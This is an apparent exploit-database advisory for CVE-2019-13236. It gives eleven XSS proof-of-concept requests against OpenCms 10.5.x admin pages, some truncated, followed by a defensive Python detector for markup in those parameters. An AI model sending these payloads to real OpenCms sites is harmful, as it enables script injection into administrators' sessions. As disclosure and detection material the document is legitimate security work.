# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13236

1. In Site Management > New site (Stored XSS):
- Affected resource: title.0
- POC:

POST /system/workplace/admin/sites/new.jsp HTTP/1.1
Host: example.com

title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se

2. In Treeview (Reflected XSS):
- Affected resource: type
- POC:

http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=

3. In Workspace tools > Login message (Stored XSS):
- Affected resource: message.0
- POC:

POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com

enabled.0=true&enabled.0.value=true&message.0=<svg onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=

4. In Index sources > View index sources > New index source (Stored XSS):
- Affected resource: name.0
- POC:

POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
Host: example.com

name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=

5. In Index sources > View field configuration > New field configuration (Stored XSS):
- Affected resource: name.0
- POC:

POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
Host: example.com

name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=

6. In Account Management > Import/Export user data (Reflected XSS):
- Affected resource: oufqn
- POC:

POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp HTTP/1.1
Host: example.com

groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=

7. In Account Management > Group Management > New Group (Stored XSS):
- Affected resources: name.0 and description.0
- POC:

POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com

name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27

8. In Account Management > Organizational Unit > Organizational Unit Management > New sub organizational unit (Stored XSS):
- Affected resources: parentOuDesc.0 and resources.0
- POC:

POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
Host: example.com

name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D

9. In Link Validator > External Link Validator > Validate External Links (Reflected XSS):
- Affected resources: reporttype, reportcontinuekey and title
- POC:

POST /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks HTTP/1.1
Host: example.com

dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK

10. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):
- Affected resources: destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0
- POC:

POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
Host: example.com

------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="inputDir.0"

.
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="destinationDir.0"

/whbo0"><script>alert(1)</script>nrbhd
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="imageGallery.0"

------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="downloadGallery.0"

------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="linkGallery.0"

[...]

11. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):
- Affected resources: destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0
- POC:

POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
Host: example.com

------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="inputDir.0"

gato
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="destinationDir.0"

testszfgw"><script>alert(1)</script>vqln7
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="imageGallery.0"

test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="downloadGallery.0"

test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="linkGallery.0"

test
[...]

Extended POCs: https://aetsu.github.io/OpenCms
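For defenders, the following is an added detection example (not part of the advisory and not OpenCms code): it inspects requests to the workplace endpoints listed above, as a reverse proxy or audit log would record them, and flags parameters that still carry HTML or script-breaking markup after URL decoding. It assumes the bodies are application/x-www-form-urlencoded; the multipart bodies of items 10 and 11 would need a multipart parser first.

```python
import re
from urllib.parse import parse_qs, urlsplit, unquote

# Endpoints named in the advisory (path suffixes; the host and /opencms
# context prefix vary per deployment).
WATCHED_PATHS = (
    "/system/workplace/admin/sites/new.jsp",
    "/system/workplace/views/explorer/tree_fs.jsp",
    "/system/workplace/admin/workplace/loginmessage.jsp",
    "/system/workplace/admin/searchindex/indexsource-new.jsp",
    "/system/workplace/admin/searchindex/fieldconfiguration-new.jsp",
    "/system/workplace/admin/accounts/imexport_user_data/export_csv.jsp",
    "/system/workplace/admin/accounts/group_new.jsp",
    "/system/workplace/admin/accounts/unit_new.jsp",
    "/system/workplace/views/admin/admin-main.jsp",
    "/system/workplace/admin/database/htmlimport/htmldefault.jsp",
    "/system/workplace/admin/database/htmlimport/htmlimport.jsp",
)

# Markup that has no place in a site title, group name or OU description:
# a script/svg/img tag, an on*= event handler, a javascript: URL, or a
# quote followed by ';' (breaking out of a JS string, as in item 9).
MARKUP = re.compile(
    r"<\s*/?\s*(script|svg|img|iframe)\b|\bon[a-z]+\s*=|javascript:|[\"']\s*;",
    re.IGNORECASE,
)


def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding; the advisory's
    requests mix single- and double-encoded values (%252F)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(method, target, body=""):
    """Return [(param, decoded_value)] for markup-bearing parameters sent
    to a watched endpoint; an empty list for anything else."""
    parts = urlsplit(target)
    if not any(parts.path.endswith(p) for p in WATCHED_PATHS):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":  # urlencoded body only (assumption)
        for name, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return [(name, decode_fully(v)) for name, values in params.items()
            for v in values if MARKUP.search(decode_fully(v))]
```

A hit on these endpoints is worth an alert on its own, since an authenticated workplace user submitting markup here is either testing or exploiting the issue; patching to a fixed OpenCms release remains the actual mitigation.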